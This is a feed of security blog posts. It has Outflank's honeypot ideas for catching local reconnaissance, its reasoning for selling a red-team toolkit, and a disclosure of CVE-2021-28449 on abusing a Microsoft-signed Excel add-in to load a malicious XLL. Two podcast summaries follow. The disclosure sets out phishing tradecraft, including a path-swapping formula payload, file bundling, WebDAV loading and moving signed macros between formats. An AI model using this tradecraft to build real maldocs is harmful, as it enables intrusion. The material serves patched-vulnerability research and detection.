Also keep in mind that reconnaissance tools enumerate file- and registry locations regardless of what software is installed. Even if you do not use specific software within your environment, you can create certain dummy files or registry locations. An added benefit of this could be: less false-positives out of the box for your environment, less fine-tuning of alerting required.

A couple of examples that could be worth implementing:

  • AppLocker configuration. Any read access to the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\SrpV2, from an unexpected process.
  • Saved RDP sessions. RDP sessions can be stored in the local user’s registry. Any read access to the registry key HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client, from an unexpected process.
  • Interesting looking (dummy) script. If you have a local scripts folder on workstations, add a dummy script with a juicy name like resetAdminpassword.ps1 and monitor for read access. Make sure the file has some dummy content. Content of this file should not be able to influence the environment.
  • Browser credential stores. Any read access to browser credential stores such as of Chrome or Firefox, that does not originate from the browser process. If you do not use a certain browser in your environment, planing fake browser credential stores in user’s roaming profiles can also be used as a trigger.
  • Other credential stores/private keys. Any read access to SSH private keys, Azure session cookie files, or password databases that are used by users, that does not originates from an unexpected process.
  • Sysmon configuration file. Any read access to the Sysmon configuration file of the local system, that does not originate from the Sysmon process.
  • Windows installation/configuration artefacts. Any read access to Unattend.xml in C:\Windows\Panther, as covered in this blog post.
  • Interesting (dummy) files on NETLOGON. Any read access to a file that looks like a legacy script or configuration file, located on the domain controller’s NETLOGON share.

Do you have suggestions for other great honeypots? Ping me on Twitter.

Future posts in this series will cover using SACLs for amongst others domain-based reconnaissance and specific attacks.

The post Catching red teams with honeypots part 1: local recon appeared first on Outflank.

Our reasoning for Outflank Security Tooling

2 April 2021 at 12:26

TLDR: We open up our internal toolkit commercially to other red teams. This post explains why.

Is blue catching your offensive actions? Are you relying on public or even commercial tools, but are these flagged by AV and EDR? Hesitant on investing deeply in offensive research and development? We’ve been there. But several years ago, we made the switch and started heavily investing in research. Our custom toolset was born.

Today we open up our toolset to other red teams in a new service called Outflank Security Tooling, abbreviated OST. We are super(!) excited about this. We truly think this commercial model is a win-win and will help other red teams and subsequently many organisations worldwide. You can find all the details at the product page. But there is more to be explained about why we do this, which is better suited in a blog post.

In this post you will find our reasoning for this service, our take on red team evolution, the relation to that other OST abbreviation and a short Q&A.

Our inhouse offensive toolset opened up for others

OST is a toolset that any red teamer would want in his arsenal. Tools that we use in our own red teaming engagements. Tools that my awesome colleagues have and continue to spend significant time researching, developing and maintaining. Proven tools that get us results.

OST is not another C2 framework. It’s an addition. A collection of tools for all stages of a red teaming operation. The following is a selection of the current toolset:

  • Office Intrusion Pack: abuse non-well-known tricks in Office to get that initial foothold.
  • Payload Generator: centralised and structured way to generate different kinds of payloads. No more heavy programming knowledge required to get payloads with awesome anti-forensics, EDR-evasion, guard-rails, transformation options, etc.
  • Lateral Pack: move lateral while staying under the radar of EDRs. A powerful collection of different ways for lateral movement.
  • Stage1 C2: OPSEC focussed C2 framework for stage 1 operations.
  • Hidden Desktop: operate interactive fat-client applications without the user experiencing anything. It’s pure interactive desktop magic.

Overall principles in a changing toolset

The toolset will change over time as we continue our R&D and as we adapt to the changing demand. But the following overall principles will stay the same:

  1. Awesome functionality that a red team would want.
  2. OPSEC safe operations that help you stay undetected.
  3. Easy to use for different skill levels within your team.
  4. Supporting documentation on concepts and details so you know what you are using.

You can find all details at the product page here. Now let’s get into our reasoning.

Public tools for red teams will not cut it anymore

Looking at our industry we have seen a strong rise in strength of blue teams the last couple of years. Both in tools and skills. This means far more effective detection and response. This is a good thing. This is what we wanted!

But this also means that public tools for red teams are becoming less and less effective against a more advanced blue team. For example, PowerShell used to be an easy choice. But nowadays any mature blue team is more than capable of stopping PowerShell based attacks. So red moves their arsenal to .NET. But proper EDRs and AMSI integration are among us. So .NET is not ideal anymore. It’s a matter of time before these attacks follow the same path as PowerShell. This pushes red into the land of direct system calls and low-level programming. But the battle has started in this area as well.

This is a good thing as it also pushes the real attackers to new territory. Hopefully shredding another layer of cybercriminals along the way.

In other words: to stay relevant, red teams need to invest heavily in their arsenal and skills.

This means more in-depth research for red teams

Doing in-depth R&D is not for the faint of hearts. It requires a distinct combination of knowledge and skills. Not only the level of detailed knowledge becomes a challenge. The broadness of knowledge as well. For example: a red team can have in-depth knowledge on low level lateral windows protocols. But without knowledge on getting your initial foothold, you miss a piece of the puzzle required for a complete operation.

It is becoming harder to have all required R&D skills in your red team. And we believe that is totally OK.

Novel R&D is not the role of a red team per se

At its core, doing novel R&D is not per se the role of the red team. Sure, it might help. But the end goal of red teams is helping their clients becoming more secure. They do this making an impact to their client via a realistic cyber-attack, and subsequently advising on how to improve. Super l33t R&D can help. But it is a means to a goal.

Take the following somewhat extreme examples:

  1. Red team A has not got the ability to do novel research and tool development. But it does have the ability to understand and use tools from others in their ops very effectively.
  2. Red team B does great detailed research and has the best custom tools. They built everything themselves. But they fail to execute this in a meaningful manner for their clients.

Red team B fails to help its client. Red team A is by far the more successful and effective red team.

This is not a new thing. We see it throughout our industry. Does a starting red team develop its own C2? No, it buys one of the available options. Even we – a pretty mature red team – still buy Cobalt Strike. Because it helps us to be more effective in our work.

This got us thinking. And eventually made us decide to start our OST service.

We founded Outflank to do red teaming right

Back in 2016, we founded Outflank because we wanted to:

  1. Help organizations battling the rising risk of targeted cyber-attacks.
  2. Push the industry with research.
  3. Have some fun along the way.

Starting with just 4 people, we were a highly specialized and high performing team. Not much has changed since then. Only the number has increased to 7. We don’t hire to grow as an objective. We grow when we find the right person on skill and personal level. It is the way we like our company to operate.

This has many benefits. Not at least a client base full of awesome companies that we are truly honoured to serve. And as we help them progress with their security, we are having fun along the way. This is what I call a win-win situation.

OST helps with heavy R&D economics

Our Outflank model does not scale well. We can’t serve every company on the planet and make it more secure. But in a way, we do want to help every company in the world. Or at least as many as we can. If we can’t serve them all, maybe we can at least have our tools serve them indirectly. Why not share these tools and in a way have them help companies worldwide?

This new model also helps with the economics of heavy R&D. As discussed earlier, modern red teaming requires tremendous research and development time. That is OK. We love doing that. But there comes a point that huge development time isn’t commercially feasible for our own engagements anymore. With OST, we have a financial incentive for heavy research which in turn helps the world to become more secure.

Or to put it boldly: OST enables us to finally take up major research areas that we were holding off due to too heavy R&D time. This then flows into the OST toolset, allowing customers and their clients to benefit.

We love sharing our novel tools and research

Our final reason is that we are techies at heart that love sharing our research on conferences, blogs and GitHub. We have done so a lot, especially if you look at the size of our little company. We would be very sad if we have to stop doing this.

But when you find your own previously shared research and tools in breach investigation reports on cyber criminals and state actors, it makes you think (example 1, example 2, example 3).

This brings me to that other OST abbreviation.

We are not blind to the public OST debate

OST is also an abbreviation for Offensive Security Tooling. You know, that heated discussion (especially on Twitter) between vocal voices on both blue and red side. A discussion where we perhaps have forgotten we are in this together. Red and blue share the same goal!

All drama aside, there is truth in the debate. Here at Outflank we highlighted the following arguments that we simply can’t ignore:

  1. Publicly available offensive tools are used in big cyber-attacks.
  2. Researchers sharing their offensive tools make other red teams (and blue teams) more effective. This in turn makes sure the defensive industry goes forward.
  3. The sharing of new research and tools is a major part of our industry’s ability to self-educate. This helps both red and blue.

The Outflank Security Tooling service contains tools built upon our research that we did not share before. We haven’t shared this because some of this research resulted in mayhem-level like tools. We don’t want these in the hands of cyber criminals and state actors. This decision was made well before the OST debate even started.

We counter the first and second arguments by not releasing our very powerful tools to the wide public, but to interested red teams.

We counter the third argument by continuing to present our research at conferences and share some PoCs of our non-mayhem-level tools. This way we can still contribute to the educational aspect that makes our industry so cool.

With our OST service we believe we make a (modest) step to a more secure world.

We are excited about OST and hope you are as well

We think OST is awesome! We believe it will allow other red teams to keep being awesome and help their clients. At the same time, OST provides an economic incentive to keep pushing for new research and tools that our customers will benefit from.

While we continue to release some of our non-dangerous research and PoCs to the public, OST allows us to share the dangerous tools only to selected customers. And have some fun while doing this. Again, a win-win situation.

We are excited about bringing OST to market. We hope you are as well!

This is not the end of the story

Instead, this is the start of an adventure. An adventure during which we already learned an awful lot about things such as the ‘Intrusion Software’ part of the Wassenaar Agreement, export controls and how to embed this technically into a service.

We believe that sharing information will make the world a better place. So, we will make sure to share our lessons learned during this adventure in future blog posts and at conferences. Such that our industry can benefit from this.

Q&A

Does this mean you will stop publishing tools on your GitHub page?

No, sharing is at our core!

We will continue releasing proof-of-concept code and research on our GitHub page. We will keep contributing to other public offensive tools. Only our most dangerous tools will be released in a controlled manner via the OST service. Non-directly offensive tools such as RedELK will remain open source.

You can expect new public tool releases in the future.

Is OST available for everyone?

Due to the sensitivity of the tools, our ethical standards and because of export controls on intrusion software, we will be selective in which red teams we can serve with OST.

It is our obligation to prevent abuse of these tools in cybercriminal or geopolitical attacks. This will limit our clientele for sure. But so be it. We need clients that we can trust (and we take some technical measures against tool leakage of course).

Can I make my low skill pentest team be a l33t red team with OST?

Not really, and this is not the goal of OST. A toolset is an important part of a red teaming operation. But a team of skilled operators is at least as important!

We want red teams to understand what is happening under the hood when our tools are used. And OST supports them in this, for example by in-depth documentation of the techniques implemented in our tools.

Can I get a demonstration of the OST toolkit?

Yes.

The post Our reasoning for Outflank Security Tooling appeared first on Outflank.

A phishing document signed by Microsoft – part 1

9 December 2021 at 12:27

This blog post is part of series of two posts that describe weaknesses in Microsoft Excel that could be leveraged to create malicious phishing documents signed by Microsoft that load arbitrary code.

These weaknesses have been addressed by Microsoft in the following patch: CVE-2021-28449. This patch means that the methods described in this post are no longer applicable to an up-to-date and securely configured MS Office install. However, we will uncover a largely unexplored attack surface of MS Office for further offensive research and will demonstrate practical tradecraft for exploitation.

In this blog post (part 1), we will discuss the following:

  • The Microsoft Analysis ToolPak Excel and vulnerabilities in XLAM add-ins which are distributed as part of this.
  • Practical offensive MS Office tradecraft which is useful for weaponizing signed add-ins which contain vulnerabilities, such as transposing third party signed macros to other documents.
  • Our analysis of Microsoft’s mitigations applied by CVE-2021-28449.

We will update this post with a reference to part 2 once it is ready.

An MS Office installation comes with signed Microsoft Analysis ToolPak Excel add-ins (.XLAM file type) which are vulnerable to multiple code injections. An attacker can embed malicious code without invalidating the signature for use in phishing scenarios. These specific XLAM documents are signed by Microsoft.

The resulting exploit/maldoc supports roughly all versions of Office (x86+x64) for any Windows version against (un)privileged users, without any prior knowledge of the target environment. We have seen various situations at our clients where the specific Microsoft certificate is added as a Trusted Publisher (meaning code execution without a popup after opening the maldoc). In other situations a user will get a popup showing a legit Microsoft signature. Ideal for phishing!

Research background

At Outflank, we recognise that initial access using maldocs is getting harder due to increased effectiveness of EDR/antimalware products and security hardening options for MS Office. Hence, we continuously explore new vectors for attacking this surface.

During one of my research nights, I started to look in the MS Office installation directory in search of example documents to further understand the Office Open XML (OpenXML) format and its usage. After strolling through the directory C:\program files\Microsoft Office\ for hours and hours, I found an interesting file that was doing something weird.

Introduction to Microsoft’s Analysis Toolpak add-in XLAMs

The Microsoft Office installation includes a component named “Microsoft’s Analysis ToolPak add-in”. This component is implemented via Excel Add-ins (.XLAM), typically named ATPVBAEN.XLAM and located in the office installation directory. In the same directory, there is an XLL called analys32.xll which is loaded by this XLAM. An XLL is a DLL based Excel add-in.

The folders and files structure are the same for all versions and look like this:

The Excel macro enabled add-in file (XLAM) file format is relatively similar to a regular macro enabled Excel file (XLSM). An XLAM file usually contains specific extensions to Excel so new functionality and functions can be used in a workbook. Our ATPVBAEN.XLAM target implements this via VBA code which is signed by Microsoft. However, signing the VBA code does not imply integrity control over the document contents or the resources it loads…

Malicious code execution through RegisterXLL

So, as a first attempt I copied ATPVBAEN.XLAM to my desktop together with a malicious XLL which was renamed to analys32.xll. The signed XLAM indeed loaded the unsigned malicious XLL and I had the feeling that this could get interesting.

Normally, the signed VBA code in ATPVBAEN.XLAM is used to load an XLL in the same directory via a call to RegisterXLL. The exact path of this XLL is provided inside an Excel cell in the XLAM file. Cells in a worksheet are not signed or validated and can be manipulated by an attacker. In addition, there is no integrity check upon loading the XLL. Also, no warning is given, even if the XLL is unsigned or loaded from a remote location.

We managed to weaponize this into a working phishing document loading an XLL over WebDAV. Let’s explore why this happened.

No integrity checks on loading unsigned code from a signed context using RegisterXLL

ATPVBAEN.XLAM loads ANALYS32.XLL and uses its exported functions to provide functionality to the user. The XLAM loads the XLL using the following series of functions which are analysable using the olevba tool. Note that an XLL is essentially just a DLL with the function xlAutoOpen exported. The highlighted variables and functions are part of the vulnerable code:

> olevba ATPVBAEN.XLAM
olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
=================================================================
VBA MACRO VBA Functions and Subs.bas
in file: xl/vbaProject.bin - OLE stream: 'VBA/VBA Functions and Subs'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' ANALYSIS TOOLPAK  -  Excel AddIn
' The following function declarations provide interface between VBA and ATP XLL.

' These variables point to the corresponding cell in the Loc Table sheet.
Const XLLNameCell = "B8"
Const MacDirSepCell = "B3"
Const WinDirSepCell = "B4"
Const LibPathWinCell = "B10"
Const LibPathMacCell = "B11"

Dim DirSep As String
Dim LibPath As String
Dim AnalysisPath As String

The name of the XLL is saved in cell B4 and the path in cell B10. Which looks as follows, if you unhide the worksheet:

The auto_open() function is called when the file is opened and the macro’s are enabled/trusted.

' Setup & Registering functions

Sub auto_open()
    Application.EnableCancelKey = xlDisabled
    SetupFunctionIDs
    PickPlatform             
    VerifyOpen               
    RegisterFunctionIDs      
End Sub

First, the PickPlatform function is called to set the variables. LibPath, is set here to LibPathWinCell’s value (which is under the attacker’s control) in case the workbook is opened on Windows.

Private Sub PickPlatform()
    Dim Platform

    ThisWorkbook.Sheets("REG").Activate
    Range("C3").Select
    Platform = Application.ExecuteExcel4Macro("LEFT(GET.WORKSPACE(1),3)")
    If (Platform = "Mac") Then
        DirSep = ThisWorkbook.Sheets("Loc Table").Range(MacDirSepCell).Value
        LibPath = ThisWorkbook.Sheets("Loc Table").Range(LibPathMacCell).Value
    Else
        DirSep = ThisWorkbook.Sheets("Loc Table").Range(WinDirSepCell).Value
        LibPath = ThisWorkbook.Sheets("Loc Table").Range(LibPathWinCell).Value
    End If
End Sub

The function VerifyOpen will try looking for the XLL, as named in XLLNameCell = "B8", then start looking in the entire PATH of the system and finally look in the path as defined by LibPath. Note, all (red / orange) highlighted variables are under the attacker’s control and vulnerable. We are going to focus on attacking the red highlighted code.

Private Sub VerifyOpen()
    XLLName = ThisWorkbook.Sheets("Loc Table").Range(XLLNameCell).Value

    theArray = Application.RegisteredFunctions
    If Not (IsNull(theArray)) Then
        For i = LBound(theArray) To UBound(theArray)
            If (InStr(theArray(i, 1), XLLName)) Then
                Exit Sub
            End If
        Next i
    End If

    Quote = String(1, 34)
    ThisWorkbook.Sheets("REG").Activate
    WorkbookName = "[" & ThisWorkbook.Name & "]" & Sheet1.Name
    AnalysisPath = ThisWorkbook.Path

    AnalysisPath = AnalysisPath & DirSep
    XLLFound = Application.RegisterXLL(AnalysisPath & XLLName)
    If (XLLFound) Then
        Exit Sub
    End If

    AnalysisPath = ""
    XLLFound = Application.RegisterXLL(AnalysisPath & XLLName)
    If (XLLFound) Then
        Exit Sub
    End If

    AnalysisPath = LibPath
    XLLFound = Application.RegisterXLL(AnalysisPath & XLLName)
    If (XLLFound) Then
        Exit Sub
    End If

    XLLNotFoundErr = ThisWorkbook.Sheets("Loc Table").Range("B12").Value
    MsgBox (XLLNotFoundErr)
    ThisWorkbook.Close (False)
End Sub

RegisterXLL will load any XLL without warning / user validation. Copying the XLAM to another folder and adding a (malicious) XLL named ANALYS32.XLL in the same folder allows for unsigned code execution from a signed context.

There are no integrity checks on loading additional (unsigned) resources from a user-accepted (signed) context.

Practical weaponization and handling different MS Office installs

For full weaponization, an attacker needs to supply the correct XLL (32 vs 64 bit) as well as a method to deliver multiple files, both the Excel file and the XLLs. How can we solve this?

Simple weaponization

The simplest version of this attack can be weaponized by an attacker once he can deliver multiple files, an Excel file and the XLL payload. This can be achieved by multiple vectors, e.g. offering multiple files for download and container formats such as .zip, .cab or .iso.

In the easiest form, the attacker would copy the ATPVBAEN.XLAM from the Office directory and serve a malicious XLL, named ANALYS32.XLL next to it. The XLAM can be renamed according to the phishing scenario. By changing the XLLName Cell in the XLAM, it is possible to change the XLL name to an arbitrary value as well.

MS Office x86 vs x64 bitness – Referencing the correct x86 and x64 XLLs (PoC 1)

For a full weaponization, an attacker would require knowledge on whether 64-bit or 32-bit versions of MS Office are used at a victim. This is required because an XLL payload (DLL) works for either x64 or x86.

It is possible to obtain the Office bitness using =INFO("OSVERSION") since the function is executed when the worksheet is opened, before the VBA Macro code is executed. For clarification, the resulting version string includes the version of Windows and the bitness of Office, ex; “Windows (32-bit) NT 10.00”. An attacker can provide both 32- and 64-bit XLLs and use Excel formulas to load the correct XLL version.

The final bundle to be delivered to the target would contain:

PoC-1-local.zip
├ Loader.xlam 
├ demo64.dat
├ demo32.dat

A 64-bit XLL is renamed to demo64.dat and is loaded from the same folder. It can be served as zip, iso, cab, double download, etc.

Payload: Changed XLLName cell B8 to
= "demo" & IF(ISERROR(SEARCH("64";INFO("OSVERSION"))); "32"; "64") & ".dat"

Loading the XLL via webdav

With various Office trickery, we also created a version where the XLAM/XLSM could be sent directly via email and would load the XLL via WebDAV. Details of this are beyond the scope of this blog, but there are quite a few tricks to enable the WebDAV client on a target’s machine via MS Office (but that is for part 2 of this series).

Signed macro transposing to different file formats

By copying the vbaproject.bin, signed VBA code can be copied/transposed into other file formats and extensions (e.g. from XLAM to XLSM to XLS).

Similarly, changing the file extension from XLAM to XLSM can be performed by changing one word inside the document in [Content_Types].xml from ‘addin’ to ‘sheet’. The Save As menu option can be used to convert the XLSM (Open XML) to XLS (compound file).

Signature details

Some noteworthy aspects of the signature that is applied on the VBA code:

  • The VBA code in the XLAM files is signed by Microsoft using timestamp signing which causes the certificate and signature to remain valid, even after certificate expiration. As far as we know, timestamp signed documents for MS Office cannot be revoked.
  • The XLAMs located in the office installer are signed by CN = Microsoft Code Signing PCA 2011 with varying validity start and end dates. It appears that Microsoft uses a new certificate every half year, so there are multiple versions of this certificate in use.
  • In various real-world implementations at our clients, we have seen the Microsoft Code Signing PCA 2011 installed as a Trusted Publisher. Some online resources hint towards adding this Microsoft root as a trusted publisher. This means code execution without a popup after opening the maldoc.
  • In case an environment does not have the Microsoft certificate as trusted publisher, then the user will be presented with a macro warning. The user can inspect the signature details and will observe that this is a genuine Microsoft signed file.

Impact summary

An attacker can transpose the signed code into various other formats (e.g. XLS, XLSM) and use it as a phishing vector.

In case a victim system has marked the Microsoft certificate as trusted publisher and the attacker manages to target the correct certificate version a victim will get no notification and attacker code is executed. 

In case the certificate is not trusted, the user will get a notification and might enable the macro as it is legitimately signed by Microsoft.

Scope: Windows & Mac?

Affected products: confirmed on all recent versions of Microsoft Excel (2013, 2016, 2019), for both x86 and x64 architectures. We have found signed and vulnerable ATPVBAEN.XLAM files dating back from 2009 while the file contains references to “Copyright 1991,1993 Microsoft Corporation”, hinting this vulnerability could be present for a very long time. 

It is noteworthy to mention that the XLAM add-in that we found supports both paths for Windows and for MacOS and launches the correct XLL payload accordingly. Although MacOS is likely affected, it has not been explicitly tested by us. Theoretically, the sandbox should mitigate (part of) the impact. Have fun exploring this yourself, previous applications by other researchers of our MS Office research to the Mac world have had quite some impact. 😉

Microsoft’s mitigation

Microsoft acknowledged the vulnerability, assigned it https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28449 and patched it 5 months later. 

Mitigation of this vulnerability was not trivial, due to other weaknesses in these files (see future blog post 2 of this series). Mitigation of the weakness described in this post has been implemented by signing the XLL and a new check that prevents ‘downgrading’ and loading of an unsigned XLL. By default, downgrading is not allowed but this behavior can be manipulated/influenced via the registry value SkipSignatureCheckForUnsafeXLL as described in https://support.microsoft.com/en-gb/office/add-ins-and-vba-macros-disabled-20e11f79-6a41-4252-b54e-09a76cdf5101.

Disclosure timeline

Submitted to MSRC: 30 November 2020

Patch release: April 2021

Public disclosure: December 2021

Acknowledgement: Pieter Ceelen & Dima van de Wouw (Outflank)

Next blog: Other vulnerabilities and why the patch was more complex

The next blog post of this series will explain other vulnerabilities in the same code, show alternative weaponization methods and explain why the patch for CVE-2021-28449 was a complex one.

The post A phishing document signed by Microsoft – part 1 appeared first on Outflank.

How to work in cloud security | Guest Menachem Shafran

By: Infosec
13 December 2021 at 08:00

On today’s podcast, Menachem Shafran of XM Cyber talks about cloud security. Menachem tells us about the work of project manager and product manager, how the haste to migrate to the cloud can unnecessarily leave vulnerabilities wide open and why a cloud security expert also needs to be a good storyteller.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
2:40 - Getting into cybersecurity
5:47 - Project manager in cybersecurity
9:12 - Identifying pain points
10:24 - Working as a VP of product
14:09 - Data breaches
16:30 - Critical versus non-critical data breaches
18:19 - Attacker’s market 
19:38 - How do we secure the cloud?
22:45 - A safer cycle of teams
24:40 - How to implement cybersecurity changes
28:50 - How to work in cloud security
30:48 - A good cloud security resume 
33:02 - Work from home and cloud security
34:30 - XM Cyber’s services 
37:21 - Learn more about Menachem
38:00 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

High-tech hacking tools and how to defend against them | Guest Bentsi Ben-Atar

By: Infosec
20 December 2021 at 08:00

Bentsi Ben-Atar of Sepio Systems talks about some truly scary high-tech hacking weapons and techniques, from Raspberry Pis in your mouse or keyboard to charging cables that can exfiltrate data from a mile away. What do we do? How do we prepare?

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:18 - Getting into cybersecurity
4:30 - Career highlights 
5:50 - Co-founding two companies 
7:22 - Typical work day at CTO and CMO
11:29 - New stealthy hacking tools
13:08 - Hacking a smart copy machine
17:46 - Stealing data with a Raspberry Pi
26:01 - The ninja cable 
32:11 - Security awareness while traveling 
35:20 - How to work battling high-tech cybercrime
36:35 - Exploring cybersecurity 
37:47 - More about Bentsi’s companies
39:31 - Find more about Bentsi 
39:57 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

❌
❌